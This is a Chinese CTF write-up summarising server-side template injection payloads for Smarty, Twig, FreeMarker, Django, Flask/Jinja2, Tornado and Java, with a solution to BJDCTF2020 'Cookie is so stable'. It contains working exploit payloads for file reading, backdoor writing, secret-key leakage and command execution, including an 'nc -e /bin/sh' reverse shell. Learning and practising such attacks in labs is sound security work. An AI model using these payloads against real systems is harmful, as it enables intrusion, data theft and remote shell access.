知识点:
模板注入漏洞总结:参考:很全的总结:一篇文章带你理解漏洞之 SSTI 漏洞 | K0rz3n's Blog
1.常用的模板引擎
PHP:smarty Twig Blade;
python : jinja2 django tornado
java : JSP FreeMarker Velocity
当在服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题.
具体看参考;下面讲使用;
注入检测:工具:GitHub - epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool
使用:
Tplmap的安装与用法(内包含解决缺少库报错的处理教程)_小 白 萝 卜的博客-CSDN博客_tplmap
![CTF知识点|SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable](http://img.readke.com/220724/0KT42D7-0.jpg)
文章图片
Twig
{{7*‘7’}} 输出49
Jinja
{{7*‘7’}}输出7777777
攻击:
攻击方向:
找到模板注入主要从三个方向进行攻击
(1)模板本身
(2)框架本身
(3)语言本身
1.模板本身;
(1)Smarty
payload
打开文件:
{self::getStreamVariable("file:///proc/self/loginuid")}写后门:
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())}(2)Twig
payload:其中id是命令;
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}(3)freeMarker
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }2.利用框架本身的特性进行攻击
1).Django
http://localhost:8000/?email={user.groups.model._meta.app_config.module.admin.settings.SECRET_KEY}http://localhost:8000/?email={user.user_permissions.model._meta.app_config.module.admin.settings.SECRET_KEY}2).Flask/Jinja2
config 是Flask模版中的一个全局对象,它代表“当前配置对象(flask.config)”,它是一个类字典的对象,它包含了所有应用程序的配置值。在大多数情况下,它包含了比如数据库链接字符串,连接到第三方的凭证,SECRET_KEY等敏感值。虽然config是一个类字典对象,但是通过查阅文档可以发现 config 有很多神奇的方法:from_envvar, from_object, from_pyfile, 以及root_path。
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil', 'w').write('from os import system%0aSHELL = system') }}
//写文件
{{ config.from_pyfile('/tmp/evil') }}
//加载system
{{ config['SHELL']('nc xxxx xx -e /bin/sh') }}
//执行命令反弹SHELL3).Tornado
http://117.78.26.79:31093/error?msg={{handler.settings}}3.利用模语言本身的特性进行攻击
1)python
Python 沙盒逃逸备忘 | K0rz3n's Blog
2).JAVA
payload:
${T(java.lang.System).getenv()}${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}当然要是文件操作就要用另外的类了,思路是不变的
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
回到题目:
在flag界面输入{{7*7}}
回显49;
存在模板注入;
题目提示cookie;
抓包看看:也可以F12 网络查看数据包发现;
![CTF知识点|SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable](http://img.readke.com/220724/0KT41515-1.jpg)
文章图片
有一个set-cookie;
也就是模板注入的地方:
先使用sytem()试试;
![CTF知识点|SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable](http://img.readke.com/220724/0KT42055-2.jpg)
文章图片
不行,再看看这是什么类型的注入:
使用{{7*'7'}} 还是回显49,看来是Twig;
直接上payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
(要在第二个数据包中构造cookie的user;下图是第一个,在参数username直接构造不是不行的)
![CTF知识点|SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable](http://img.readke.com/220724/0KT46001-3.jpg)
文章图片
可以用F12看看数据包:
![CTF知识点|SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable](http://img.readke.com/220724/0KT45003-4.jpg)
文章图片
![CTF知识点|SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable](http://img.readke.com/220724/0KT43419-5.jpg)
文章图片
![CTF知识点|SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable](http://img.readke.com/220724/0KT45G1-6.jpg)
文章图片
【CTF知识点|SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable】
推荐阅读
- #|【攻防世界WEB】难度四星12分进阶题(Confusion1)
- #|【攻防世界WEB】难度三星9分入门题(下)(shrine、lottery)
- 组会|MITRE ATT&CK超详细学习笔记-01(背景,术语,案例)
- 心余力绌(企业面临的软件供应链安全困境)
- Windows|压缩文件如何设置密码(/ 如何破解压缩文件密码?)
- 攻防世界|攻防世界——zorropub
- 渗透测试|Linux提权
- 综合渗透测试|网络安全——使用SSH私钥泄露提权获取主机权限
- 内网安全——域横向内网漫游